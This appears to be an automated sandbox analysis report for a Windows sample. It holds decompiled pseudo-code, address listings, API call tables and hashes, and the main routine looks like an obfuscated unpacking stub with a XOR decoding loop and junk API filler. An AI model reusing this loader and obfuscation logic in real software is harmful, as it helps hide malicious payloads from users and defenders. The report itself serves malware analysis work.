														__imp__#17();
														_t932 = CreateWindowExA(0, "SysListView32", 0, 0x50800001, 0xa, 0xa, 0x1f4, 0xc8, _t931, 0, _t666, 0);
														_t746 =  *0x46320c; // 0x0
														 *(_t937 - 0x38) = ImageList_LoadImageA(_t666,  *0x4631d8 & 0x0000ffff, 1, 0xffffff, _t746, 0, 0);
														_t539 =  *0x46320c; // 0x0
														_t540 = ImageList_LoadImageA(_t666,  *0x4631dc & 0x0000ffff, 1, 0xffffff, _t539, 0, 0);
														SendMessageA(_t932, 0x1003, 1,  *(_t937 - 0x38));
														SendMessageA(_t932, 0x1003, 0, _t540);
														 *(_t937 + 0x10) = 0xf;
														 *(_t937 + 0x14) = 0;
														 *(_t937 + 0x18) = 0x96;
														 *(_t937 + 0x1c) = 0x4515f5;
														 *(_t937 + 0x24) = 0;
														SendMessageA(_t932, 0x101b, 0, _t937 + 0x10);
														 *(_t937 + 0x1c) = 0x4515f5;
														 *(_t937 + 0x24) = 1;
														SendMessageA(_t932, 0x101b, 1, _t937 + 0x10);
														 *(_t937 + 0x18) = 0x12c;
														 *(_t937 + 0x1c) = 0x4515f5;
														 *(_t937 + 0x24) = 2;
														SendMessageA(_t932, 0x101b, 2, _t937 + 0x10);
														 *(_t937 + 0x73c) = 3;
														 *(_t937 + 0x748) = 0;
														 *(_t937 + 0x74c) = 0;
														 *(_t937 + 0x758) = 0;
														 *(_t937 + 0x744) = 0;
														 *(_t937 + 0x740) = 0;
														 *(_t937 + 0x750) = 0x4515f5;
														SendMessageA(_t932, 0x1007, 0, _t937 + 0x73c);
														 *(_t937 + 0x758) = 0xffffffff;
														 *(_t937 + 0x744) = 1;
														 *(_t937 + 0x750) = "1";
														SendMessageA(_t932, 0x1006, 0, _t937 + 0x73c);
														 *(_t937 + 0x744) = 2;
														 *(_t937 + 0x750) = 0x4515f5;
														SendMessageA(_t932, 0x1006, 0, _t937 + 0x73c);
														 *(_t937 + 0x758) = 0;
														 *(_t937 + 0x740) = 1;
														 *(_t937 + 0x744) = 0;
														 *(_t937 + 0x750) = 0x4515f5;
														SendMessageA(_t932, 0x1007, 0, _t937 + 0x73c);
														 *(_t937 + 0x758) = 0xffffffff;
														 *(_t937 + 0x744) = 1;
														 *(_t937 + 0x750) = "5";
														SendMessageA(_t932, 0x1006, 0, _t937 + 0x73c);
														 *(_t937 + 0x744) = 2;
														 *(_t937 + 0x750) = 0x4515f5;
														SendMessageA(_t932, 0x1006, 0, _t937 + 0x73c);
														 *(_t937 + 0x758) = 1;
														 *(_t937 + 0x740) = 2;
														 *(_t937 + 0x744) = 0;
														 *(_t937 + 0x750) = 0x4515f5;
														SendMessageA(_t932, 0x1007, 0, _t937 + 0x73c);
														 *(_t937 + 0x758) = 0xffffffff;
														 *(_t937 + 0x744) = 1;
														 *(_t937 + 0x750) = "1";
														_t833 = _t937 + 0x73c;
														SendMessageA(_t932, 0x1006, 0, _t937 + 0x73c);
														 *(_t937 + 0x744) = 2;
														 *(_t937 + 0x750) = 0x4515f5;
														SendMessageA(_t932, 0x1006, 0, _t937 + 0x73c);
														goto L175;
													} else {
														__eflags = _t536 == 1;
														if(_t536 == 1) {
															PostQuitMessage(0);
															L175:
															_t501 = 0;
															__eflags = 0;
															L176:
															 *[fs:0x0] =  *((intOrPtr*)(_t937 - 0x10));
															_pop(_t901);
															_pop(_t925);
															_pop(_t663);
															__eflags =  *(_t937 + 0x778) ^ _t937;
															return E004230EF(_t501, _t663,  *(_t937 + 0x778) ^ _t937, _t833, _t901, _t925);
														}
														_t850 =  *0x4631f4; // 0xfff48ebd
														_t562 =  *0x460334; // 0xc30c4
														DefWindowProcA(_t931, _t745, _t562, _t850);
														_t821 = 0;
														__eflags = 0;
														goto L111;
													}
												}
											}
											_t933 =  *0x463204; // 0x4
											_t934 = _t933 + 0xde;
											_t753 =  *0x462f5c; // 0x4770000
											 *(_t937 - 0x20) = _t753;
											 *(_t937 - 0x28) = 0;
											__imp__WSACreateEvent();
											 *(_t937 - 0x24) = _t472;
											_t754 =  *0x4631e4; // 0x0
											 *(_t937 + 0x678 + _t754 * 4) = _t472;
											__imp__WSAWaitForMultipleEvents(1, _t937 + 0x678, 0, _t754, 0);
											_t755 =  *0x4631e4; // 0x0
											__eflags = _t472 - _t755;
											if(_t472 == _t755) {
												L100:
												_t821 = 0;
												__eflags = 0;
												goto L101;
											}
											_t565 =  *0x4631ec; // 0x0
											 *(_t937 - 0x30) = _t565;
											__eflags =  *(_t937 - 0x24) -  *0x4631e8; // 0x789
											if(__eflags != 0) {
												_t765 = _t755 + 1;
												__eflags = _t765;
												 *(_t937 - 0x30) = _t765;
											}
											 *(_t937 - 0x1c) = 0;
											__eflags = _t659;
											if(_t659 > 0) {
												do {
													 *(_t937 - 0x39) =  *((intOrPtr*)( *(_t937 - 0x20) +  *(_t937 - 0x1c)));
													_t567 =  *0x4631ec; // 0x0
													_t568 = ShowWindow(_t567, 5); // executed
													__eflags = _t568;
													if(_t568 != 0) {
														_t764 =  *0x4631d8; // 0xfff48ebd
														_t864 =  *0x4631ec; // 0x0
														EnumChildWindows(_t864, E00408860, _t764);
													}
													_t574 =  *(_t937 - 0x28) - ((0x55555556 *  &(( *(_t937 - 0x28))[_t934]) >> 0x20) + (0x55555556 *  &(( *(_t937 - 0x28))[_t934]) >> 0x20 >> 0x1f)) * _t934;
													_t759 = _t574 ^  *(_t937 - 0x39);
													_t859 =  *(_t937 - 0x1c);
													__eflags = _t934;
													if(_t934 == 0) {
														 *( *(_t937 - 0x20) + _t859) =  *(_t937 - 0x20);
													} else {
														 *( *(_t937 - 0x20) + _t859) = _t759;
														_t659 =  *(_t937 - 0x38);
													}
													 *(_t937 - 0x28) =  *(_t937 - 0x28) + _t574 *  *(_t937 - 0x30) * (_t574 *  &( *(_t937 - 0x30)->i) +  *(_t937 - 0x28) * _t934) * _t934;
													_t579 =  *(_t937 - 0x1c) + 1;
													 *(_t937 - 0x1c) = _t579;
													__eflags = _t579 - _t659;
												} while (_t579 < _t659);
											}
											goto L100;
										}
									}
									ExitProcess(0);
								} else {
									L65:
									ExitProcess(0);
								}
							}
						}
						_t642 =  *(_t937 - 0x20);
						continue;
					}
					_t612 = midiInGetNumDevs();
					 *(_t937 - 0x28) = _t612;
					_t936 = 0;
					if(_t612 <= 0) {
						L10:
						_t886 =  *0x4631dc; // 0x2ad58
						_t613 =  *0x463210; // 0x0
						_t917 = GetDlgItem(_t613, _t886);
						_t904 = BeginPaint(_t917, _t937 + 0x738);
						_t887 =  *0x4631e4; // 0x0
						 *(_t937 - 0x28) = _t887;
						 *(_t937 - 0x1c) =  *(_t937 - 0x1c) + GetClientRect(_t917, _t937 + 0x50);
						_t674 = CreateFontA(0x5a, 0x1e, 0, 0, 0x96, 0, 0, 0, 0, 5, 0, 4, 0, "Arial");
						SelectObject(_t904, _t674);
						_t620 = DeleteObject(_t674);
						 *(_t937 - 0x1c) =  *(_t937 - 0x1c) + SetBkMode(_t904, 1);
						 *(_t937 - 0x1c) =  *(_t937 - 0x1c) + DrawTextA(_t904, "map", 4, _t937 + 0x50, 0x25);
						 *(_t937 - 0x28) =  &(( &(( *(_t937 - 0x28))[_t620]))[EndPaint(_t917, _t937 + 0x738)]);
						_t625 = VirtualQuery(0, _t937 + 0x20, 0x1c);
						_t651 = 1;
						if(_t625 == 0) {
							L16:
							_t833 =  *0x463210; // 0x0
							if(_t833 >=  *(_t937 - 0x28)) {
								L33:
								_t501 =  *0x46320c; // 0x0
								goto L176;
							}
							_t953 =  *(_t937 - 0x20) -  *0x4631ec; // 0x0
							if(_t953 != 0) {
								goto L33;
							}
							_t954 =  *(_t937 - 0x1c) -  *0x4631e4; // 0x0
							if(_t954 != 0 ||  *0x4631f0 == 0) {
								goto L33;
							} else {
								_t956 =  *(_t937 - 0x30) -  *0x46320c; // 0x0
								_t440 =  *0x460334; // 0xc30c4
								if(_t956 < 0) {
									 *0x4631dc =  *0x4631dc +  *(_t937 - 0x38) * _t440;
								}
								_t781 =  *0x4631f4; // 0xfff48ebd
								if(_t440 > _t781) {
									 *0x4631dc =  *0x4631dc + _t651;
								}
								if( *0x4631fc == 0) {
									goto L65;
								} else {
									_t628 =  &(_t440[_t781]);
									if(_t628 == 0x110) {
										PostMessageA(_t833, 0x8000, 0, 0);
									} else {
										if(_t628 == 0x8000) {
											SHAutoComplete(SendDlgItemMessageA(GetParent(_t833), 0x47c, 0x407, 0, 0), 0x20000000);
										}
									}
									if( *0x462f60 == 0) {
										_t786 =  *0x4631fc; // 0x789
										_t630 =  *0x4631f0; // 0x3b8402f
										 *_t630 = _t786;
									}
									goto L31;
								}
							}
						}
						_t917 = VirtualQuery;
						do {
							if(( *(_t937 + 0x30) & 0x00001000) != 0 && ( *(_t937 + 0x28) & 0x000000ee) != 0) {
								 *0x4631dc =  *0x4631dc + _t651;
							}
						} while (VirtualQuery( *((intOrPtr*)(_t937 + 0x2c)) +  *(_t937 + 0x20), _t937 + 0x20, 0x1c) != 0);
						goto L16;
					} else {
						_t905 = _t937 + 0x6f8;
						do {
							_t638 = midiInGetDevCapsA(_t936, _t937 + 0x10, 0x2c);
							_t642 = _t642 + _t638 + midiInOpen(_t905, _t936, E00408860, 0, 0x30000);
							midiInStart( *_t905);
							if( *0x463210 == 0) {
								midiInClose( *_t905);
							}
							if( *0x4631f0 != 0) {
								_t679 =  *0x463210; // 0x0
								_t642 = _t679 +  *0x4631e4;
							}
							_t936 = _t936 + 1;
							_t905 =  &(_t905[1]);
						} while (_t936 <  *(_t937 - 0x28));
						 *(_t937 - 0x20) = _t642;
						goto L10;
					}
				}
			}

0x00409058
0x00000000
0x00409060
0x00409067
0x004092ac
0x004092af
0x004092b0
0x004092b3
0x004092b8
0x004092b9
0x004092c3
0x004092d7
0x004092dd
0x004092df
0x004092e5
0x004092e7
0x004092e9
0x004092ef
0x004092f1
0x004092f3
0x004092f5
0x00409308
0x00409308
0x0040930e
0x00409314
0x00409318
0x00409318
0x004092f3
0x004092ef
0x00409346
0x0040934c
0x0040934f
0x00409355
0x00409368
0x0040936d
0x00409370
0x00409377
0x0040937e
0x00409381
0x0040938a
0x0040938d
0x00409394
0x0040939a
0x0040939d
0x004093a2
0x004093ac
0x004093b2
0x004093b5
0x004093c4
0x004093e8
0x004093ed
0x004093f3
0x004093f6
0x0040955e
0x00000000
0x004093fc
0x00409402
0x00409402
0x00409408
0x0040940e
0x00409414
0x0040941f
0x0040942a
0x0040943a
0x0040943f
0x0040944c
0x0040944e
0x0040945d
0x0040945f
0x0040946c
0x00409472
0x0040947c
0x0040947e
0x004094ae
0x004094b4
0x004094b6
0x004094e0
0x004094e5
0x004094e8
0x004094ee
0x0040950b
0x0040950b
0x0040950d
0x00409512
0x00409519
0x00409536
0x0040953c
0x0040953f
0x0040953f
0x00000000
0x0040953f
0x004094c4
0x004094c6
0x004094d5
0x004094d8
0x00000000
0x004094d8
0x00409480
0x00409485
0x00409488
0x0040948d
0x00409494
0x004094a6
0x00000000
0x00409545
0x00409548
0x00409549
0x00409552
0x00409552
0x0040955a
0x00409564
0x00409564
0x00409567
0x00409569
0x0040956c
0x00409571
0x00409571
0x00409577
0x0040957d
0x00409585
0x0040958d
0x00409596
0x0040959c
0x004095a2
0x004095a8
0x004095ac
0x004095b3
0x004095b9
0x004095c6
0x004095ce
0x004095d4
0x004095dd
0x004095dd
0x004095dd
0x004095e3
0x004095e8
0x004095f2
0x004095fd
0x00409611
0x00409617
0x0040961d
0x0040961f
0x00409621
0x0040962d
0x0040962d
0x0040962f
0x0040962f
0x0040963e
0x0040964e
0x00409654
0x00409666
0x00409669
0x00409669
0x0040966b
0x00409656
0x00409656
0x00409656
0x004096a9
0x004096ab
0x004096ad
0x004096af
0x004096b1
0x004096b1
0x004096dd
0x004096e3
0x004096e6
0x004096e8
0x004096f2
0x004096f2
0x004096ea
0x004096ea
0x004096ea
0x004096f5
0x004096f8
0x004096fa
0x004096fb
0x004096fd
0x00409704
0x00409709
0x0040970e
0x00409718
0x00409720
0x00409722
0x00409736
0x00409739
0x0040973c
0x0040973f
0x00409748
0x00409749
0x0040974c
0x00409760
0x00409767
0x00409778
0x0040977b
0x0040977e
0x00409790
0x00409793
0x00409796
0x004097ac
0x004097af
0x004097b2
0x004097b9
0x004097c3
0x004097c9
0x004097cd
0x004097da
0x004097df
0x004097e9
0x004097f8
0x00409805
0x00409808
0x0040980c
0x00409816
0x00409819
0x0040981e
0x00409831
0x00409849
0x0040984b
0x0040984d
0x0040984f
0x00409852
0x00409855
0x00409855
0x00409861
0x00409873
0x0040988d
0x00409893
0x00409895
0x00409898
0x004098b5
0x0040989a
0x0040989a
0x0040989f
0x0040989f
0x004098c4
0x004098ca
0x004098cc
0x004098ea
0x004098ef
0x004098ce
0x004098e3
0x004098e3
0x004098f6
0x004098fc
0x00409929
0x00409930
0x00409936
0x00409956
0x00409958
0x0040995a
0x0040995a
0x00409973
0x00409975
0x0040997e
0x00409981
0x00409984
0x00409987
0x00409989
0x00409994
0x00409994
0x004099b0
0x004099b3
0x004099b8
0x004099ba
0x004099d0
0x004099d3
0x004099d9
0x004099f5
0x004099fb
0x00409a01
0x00409a01
0x00409a03
0x004099db
0x004099db
0x004099e7
0x004099ed
0x004099ed
0x004099bc
0x004099bc
0x004099c2
0x004099c8
0x004099c8
0x00409a09
0x00409a0d
0x00409a13
0x00409a21
0x00409a2b
0x00409a31
0x00409a34
0x00409a36
0x00409a38
0x00409a5c
0x00409a5c
0x00409a61
0x00000000
0x00409a3a
0x00409a3a
0x00409a40
0x00000000
0x00000000
0x00409a43
0x00409a4b
0x00409a52
0x00409a55
0x00409a58
0x00409a63
0x00409a63
0x00409a6f
0x00409a75
0x00409b95
0x00409b95
0x00409b97
0x00409b9d
0x00409b9f
0x00409b9f
0x00409ba2
0x00409ba8
0x00409baa
0x00409bb0
0x00409bb0
0x00409bb3
0x00409bb6
0x00409cc4
0x00409cc4
0x00409cdc
0x00409ce2
0x00409ced
0x00409cf3
0x00409cfb
0x00409d01
0x00409d03
0x00409d06
0x00409d0b
0x00409d2d
0x00409d33
0x00409d33
0x00409d33
0x00409d35
0x00409d3b
0x0040a1ae
0x0040a1b2
0x0040a1d2
0x0040a1e6
0x0040a1f2
0x0040a200
0x0040a207
0x0040a220
0x0040a234
0x0040a23b
0x0040a242
0x0040a245
0x0040a25c
0x0040a262
0x0040a26b
0x0040a26b
0x0040a271
0x0040a27a
0x0040a27f
0x0040a282
0x0040a299
0x0040a29f
0x0040a2b6
0x0040a2b6
0x0040a2bc
0x0040a2be
0x0040a2e2
0x0040a2e2
0x0040a2e4
0x0040a2e4
0x0040a2ea
0x0040a2f0
0x0040a2f6
0x0040a2f8
0x0040a2fd
0x0040a300
0x0040a300
0x0040a306
0x0040a30c
0x0040a30e
0x0040a313
0x0040a313
0x0040a31a
0x0040a320
0x0040a320
0x0040a320
0x0040a323
0x00000000
0x00000000
0x0040a2b0
0x0040a2b0
0x0040a37c
0x00000000
0x00409d41
0x00409d41
0x00409d47
0x00409d48
0x00409d4b
0x00409d50
0x00409d53
0x00409d55
0x00409d58
0x00409d58
0x00409d66
0x00409d6c
0x00409d6f
0x00409d72
0x00409d75
0x00409d75
0x00409d77
0x0040a0b0
0x0040a0b0
0x0040a0b7
0x0040a103
0x0040a105
0x0040a105
0x0040a108
0x0040a108
0x0040a10c
0x0040a124
0x0040a12a
0x0040a12a
0x0040a12d
0x0040a12d
0x0040a12f
0x0040a156
0x0040a159
0x0040a15c
0x00000000
0x00000000
0x0040a15e
0x0040a164
0x0040a164
0x0040a167
0x00000000
0x00000000
0x0040a169
0x0040a16c
0x0040a16f
0x0040a17b
0x0040a183
0x0040a183
0x0040a185
0x0040a185
0x0040a188
0x0040a18b
0x00000000
0x00000000
0x00000000
0x0040a18b
0x0040a171
0x0040a174
0x00000000
0x00000000
0x0040a176
0x0040a179
0x00000000
0x00000000
0x00000000
0x0040a179
0x0040a18d
0x00000000
0x0040a131
0x0040a13a
0x0040a13f
0x0040a14e
0x0040a151
0x0040a190
0x0040a190
0x0040a193
0x00000000
0x00000000
0x00000000
0x0040a193
0x0040a12f
0x0040a0d0
0x0040a0d6
0x0040a0d9
0x0040a0db
0x00000000
0x00000000
0x0040a0dd
0x0040a0e2
0x00000000
0x00000000
0x0040a0e4
0x0040a0e6
0x0040a0e8
0x0040a0fa
0x0040a0fa
0x0040a0fc
0x00000000
0x00000000
0x0040a0fe
0x00000000
0x0040a0fe
0x0040a0f0
0x0040a0f0
0x0040a0f5
0x00000000
0x00000000
0x0040a0f7
0x0040a0f7
0x0040a0f8
0x00000000
0x00000000
0x00000000
0x0040a0f8
0x00000000
0x0040a0f0
0x00409d7d
0x00409d80
0x00409d82
0x00000000
0x00000000
0x00409d90
0x00409d90
0x00409d93
0x00409d96
0x00000000
0x00000000
0x00409d9c
0x00409d9f
0x00000000
0x00000000
0x00409da5
0x00409da8
0x0040a096
0x0040a099
0x00000000
0x00000000
0x0040a09b
0x0040a09b
0x0040a09f
0x0040a09f
0x0040a0a0
0x0040a0a0
0x0040a0a3
0x00000000
0x00000000
0x0040a0a5
0x0040a0a8
0x0040a0aa
0x00000000
0x00000000
0x00000000
0x0040a0aa
0x00409dae
0x00409db4
0x00000000
0x00000000
0x00409dbf
0x00409dc3
0x00409dc4
0x00409dca
0x00000000
0x00000000
0x00409dd0
0x00409dd2
0x00409dd6
0x00409dd7
0x00409ddd
0x00000000
0x00000000
0x00409de3
0x00409de7
0x00409de8
0x00409dee
0x00000000
0x00000000
0x00000000
0x00409df4
0x00000000
0x0040a195
0x0040a195
0x0040a195
0x0040a19e
0x0040a1a2
0x0040a1a8
0x0040a1a8
0x00000000
0x0040a1a2
0x00409bbc
0x00409bbc
0x00409bc6
0x00409bcc
0x00409bd5
0x00409bdb
0x00409be1
0x00409beb
0x00409bf1
0x00409bf7
0x00409bfd
0x00409c03
0x00409c09
0x00409c14
0x00409c1b
0x00409c21
0x00409c27
0x00409c2d
0x00409c36
0x00409c36
0x00409c43
0x00409c49
0x00409c5d
0x00409c5f
0x00409c64
0x00409c6a
0x00409c7a
0x00409c88
0x00409c8e
0x00409c91
0x00409c97
0x00409c9f
0x00409c9f
0x00409ca0
0x00409e06
0x00409e34
0x00409e3a
0x00409e57
0x00409e5e
0x00409e74
0x00409e88
0x00409e93
0x00409e95
0x00409e9c
0x00409ea3
0x00409eaf
0x00409eb2
0x00409ec5
0x00409ec7
0x00409eca
0x00409edd
0x00409edf
0x00409ee6
0x00409ee9
0x00409efc
0x00409efe
0x00409f0a
0x00409f10
0x00409f16
0x00409f1c
0x00409f22
0x00409f28
0x00409f3c
0x00409f3e
0x00409f48
0x00409f52
0x00409f6b
0x00409f6d
0x00409f77
0x00409f8c
0x00409f90
0x00409f96
0x00409fa0
0x00409fa6
0x00409fba
0x00409fbc
0x00409fc6
0x00409fd0
0x00409fe9
0x00409feb
0x00409ff5
0x0040a00a
0x0040a00c
0x0040a016
0x0040a020
0x0040a02a
0x0040a03f
0x0040a041
0x0040a04b
0x0040a055
0x0040a05f
0x0040a06e
0x0040a070
0x0040a07a
0x0040a08f
0x00000000
0x00409ca6
0x00409ca6
0x00409ca7
0x00409dfb
0x0040a383
0x0040a383
0x0040a383
0x0040a385
0x0040a388
0x0040a390
0x0040a391
0x0040a392
0x0040a399
0x0040a3a7
0x0040a3a7
0x00409cad
0x00409cb4
0x00409cbc
0x00409cc2
0x00409cc2
0x00000000
0x00409cc2
0x00409ca0
0x00409bb6
0x00409a7b
0x00409a81
0x00409a87
0x00409a8d
0x00409a90
0x00409a97
0x00409a9d
0x00409aa0
0x00409aa6
0x00409abb
0x00409ac1
0x00409ac7
0x00409ac9
0x00409b93
0x00409b93
0x00409b93
0x00000000
0x00409b93
0x00409acf
0x00409ad4
0x00409ada
0x00409ae0
0x00409ae2
0x00409ae2
0x00409ae3
0x00409ae3
0x00409ae6
0x00409aed
0x00409aef
0x00409af5
0x00409afe
0x00409b03
0x00409b09
0x00409b0f
0x00409b11
0x00409b13
0x00409b1f
0x00409b26
0x00409b26
0x00409b45
0x00409b49
0x00409b4c
0x00409b4f
0x00409b51
0x00409b61
0x00409b53
0x00409b56
0x00409b59
0x00409b59
0x00409b81
0x00409b87
0x00409b88
0x00409b8b
0x00409b8b
0x00409af5
0x00000000
0x00409aef
0x00409a38
0x00409810
0x004097cf
0x004097cf
0x004097d1
0x004097d1
0x004097cd
0x004093f6
0x004092c5
0x00000000
0x004092c5
0x0040906d
0x00409073
0x00409076
0x0040907a
0x004090e3
0x004090e3
0x004090ea
0x004090f6
0x00409106
0x00409108
0x0040910e
0x0040911c
0x00409147
0x0040914b
0x00409152
0x00409166
0x0040917d
0x00409190
0x0040919b
0x004091a1
0x004091a8
0x004091d9
0x004091d9
0x004091e2
0x004092cd
0x004092cd
0x00000000
0x004092cd
0x004091eb
0x004091f1
0x00000000
0x00000000
0x004091fa
0x00409200
0x00000000
0x00409213
0x00409216
0x0040921c
0x00409221
0x00409229
0x00409229
0x0040922f
0x00409237
0x00409239
0x00409239
0x00409246
0x00000000
0x0040924c
0x0040924c
0x00409253
0x00409290
0x00409255
0x0040925a
0x0040927e
0x0040927e
0x0040925a
0x0040929d
0x0040929f
0x004092a5
0x004092aa
0x004092aa
0x00000000
0x0040929d
0x00409246
0x00409200
0x004091af
0x004091b5
0x004091b8
0x004091c0
0x004091c0
0x004091d5
0x00000000
0x0040907c
0x0040907c
0x00409082
0x00409089
0x004090a5
0x004090aa
0x004090b7
0x004090bc
0x004090bc
0x004090c9
0x004090cb
0x004090d1
0x004090d1
0x004090d7
0x004090d8
0x004090db
0x004090e0
0x00000000
0x004090e0
0x0040907a

APIs

midiInGetNumDevs.WINMM(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040906D
midiInGetDevCapsA.WINMM(00000000,?,0000002C), ref: 00409089
midiInOpen.WINMM(?,00000000,00408860,00000000,00030000), ref: 0040909F
midiInStart.WINMM ref: 004090AA
midiInClose.WINMM ref: 004090BC
GetDlgItem.USER32 ref: 004090F0
BeginPaint.USER32(00000000,?), ref: 00409100
GetClientRect.USER32(00000000,?), ref: 00409116
CreateFontA.GDI32(0000005A,0000001E,00000000,00000000,00000096,00000000,00000000,00000000,00000000,00000005,00000000,00000004,00000000,Arial), ref: 00409141
SelectObject.GDI32(00000000,00000000), ref: 0040914B
DeleteObject.GDI32(00000000), ref: 00409152
SetBkMode.GDI32(00000000,00000001), ref: 00409160
DrawTextA.USER32(00000000,map,00000004,?,00000025), ref: 00409177
EndPaint.USER32(00000000,?), ref: 00409188
VirtualQuery.KERNEL32(00000000,?,0000001C), ref: 0040919B
VirtualQuery.KERNEL32(?,?,0000001C), ref: 004091D3
GetParent.USER32(?), ref: 00409270
SendDlgItemMessageA.USER32(00000000), ref: 00409277
SHAutoComplete.SHLWAPI(00000000), ref: 0040927E
PostMessageA.USER32 ref: 00409290
_memset.LIBCMT ref: 00409368
InsertMenuItemA.USER32(00000000,00000000,00000000,?), ref: 004093AC
lstrcpyW.KERNEL32 ref: 004093C4
NetUserEnum.NETAPI32(?,00000000,00000000,?,00002580,?,?,?), ref: 004093E8
lstrlenW.KERNEL32(0002AD58,?,00000000,00000000,?,00002580,?,?,?), ref: 0040940E
ImageList_DragMove.COMCTL32(00000000,00000000), ref: 00409434
lstrcpyA.KERNEL32(?,empty), ref: 0040945D
PathCompactPathA.SHLWAPI(00000000,00000000,00000000), ref: 0040946C
lstrcpyA.KERNEL32(?,00451A2C), ref: 004094A6
NetApiBufferFree.NETAPI32(?,?,00000000,00000000,?,00002580,?,?,?), ref: 0040956C

Strings

Arial, xrefs: 0040911F
map, xrefs: 00409171

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: midi$Itemlstrcpy$MessageObjectPaintPathQueryVirtual$AutoBeginBufferCapsClientCloseCompactCompleteCreateDeleteDevsDragDrawEnumFontFreeImageInsertList_MenuModeMoveOpenParentPostRectSelectSendStartTextUser_memsetlstrlen
String ID: Arial$map
API String ID: 2059430500-57512258
Opcode ID: 0246b44053f0402244f2b0b070e6ad6ddc8d83135cf6425a0d12af46bcf0e649
Instruction ID: b0c4dc84949103ee2ff92adf1140e4adb0984aa67a63c060d76ca23af8be58e9
Opcode Fuzzy Hash: 0246b44053f0402244f2b0b070e6ad6ddc8d83135cf6425a0d12af46bcf0e649
Instruction Fuzzy Hash: 29614F71A40344AFE714CF54EC85BEA77B5AB09706F14447AFA01A62E2E7B8AD40CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00426304 Relevance: 24.1, APIs: 16, Instructions: 95
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E00426304(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t19;
				void* _t42;
				intOrPtr* _t50;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t50 = E00425539(8, 1);
					_t56 = _t50;
					if(_t50 != 0) {
						_t13 = E00425539(0xd8, 1);
						 *_t50 = _t13;
						__eflags = _t13;
						if(_t13 != 0) {
							_t14 = E00425539(0x220, 1);
							 *((intOrPtr*)(_t50 + 4)) = _t14;
							__eflags = _t14;
							if(_t14 != 0) {
								E00425772( *_t50, 0x460f40);
								_t47 =  *_t50;
								_t17 = E004260E8(_a4,  *_t50, _a8);
								_pop(_t42);
								__eflags = _t17;
								if(__eflags != 0) {
									_t19 = E00429A75(_t42, _t47, __eflags,  *((intOrPtr*)( *_t50 + 4)),  *((intOrPtr*)(_t50 + 4)));
									__eflags = _t19;
									if(_t19 == 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t50 + 4)))) = 1;
										 *((intOrPtr*)( *((intOrPtr*)(_t50 + 4)))) = 1;
										L17:
										return _t50;
									}
									E00422BFA( *((intOrPtr*)(_t50 + 4)));
									E00428531( *_t50);
									E004285CA( *_t50);
									E00422BFA(_t50);
									L15:
									_t50 = 0;
									goto L17;
								}
								E00428531( *_t50);
								E004285CA( *_t50);
								E00422BFA(_t50);
								goto L15;
							}
							E00422BFA( *_t50);
							E00422BFA(_t50);
							L8:
							goto L3;
						}
						E00422BFA(_t50);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E00425667(_t56))) = 0xc;
					goto L4;
				}
			}

0x0042630f
0x00426335
0x00000000
0x00426317
0x00426322
0x00426326
0x00426328
0x00426341
0x00426348
0x0042634a
0x0042634c
0x0042635d
0x00426364
0x00426367
0x00426369
0x00426382
0x0042638d
0x0042638f
0x00426394
0x00426395
0x00426397
0x004263ba
0x004263c1
0x004263c3
0x004263eb
0x004263f0
0x004263f2
0x00000000
0x004263f2
0x004263c8
0x004263cf
0x004263d6
0x004263dc
0x004263e4
0x004263e4
0x00000000
0x004263e4
0x0042639b
0x004263a2
0x004263a8
0x00000000
0x004263ad
0x0042636d
0x00426373
0x00426354
0x00000000
0x00426354
0x0042634f
0x00000000
0x0042634f
0x0042632a
0x0042632f
0x00000000
0x0042632f

APIs

__calloc_crt.LIBCMT ref: 0042631D

Part of subcall function 00425539: Sleep.KERNEL32(00000000), ref: 00425561

__calloc_crt.LIBCMT ref: 00426341
_free.LIBCMT ref: 0042634F
__calloc_crt.LIBCMT ref: 0042635D
_free.LIBCMT ref: 0042636D
_free.LIBCMT ref: 00426373
__copytlocinfo_nolock.LIBCMT ref: 00426382
__setlocale_nolock.LIBCMT ref: 0042638F
___removelocaleref.LIBCMT ref: 0042639B
___freetlocinfo.LIBCMT ref: 004263A2
_free.LIBCMT ref: 004263A8
__setmbcp_nolock.LIBCMT ref: 004263BA
_free.LIBCMT ref: 004263C8
___removelocaleref.LIBCMT ref: 004263CF
___freetlocinfo.LIBCMT ref: 004263D6
_free.LIBCMT ref: 004263DC

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 888903860-0
Opcode ID: d5ecae940ef5f18a7266734cab3a20958161a7b50cda1a7cb41bce99e0c2bf7e
Instruction ID: 1590f7a4ee48edb7c0cea94c879ca3491e2b0cdc9496383810dfce9b918eaa2c
Opcode Fuzzy Hash: d5ecae940ef5f18a7266734cab3a20958161a7b50cda1a7cb41bce99e0c2bf7e
Instruction Fuzzy Hash: 2F21F231304630FBD725AF2AF80290ABBE5EF51364BE1401FF88946261DE7DDC40965C

Uniqueness

Uniqueness Score: -1.00%

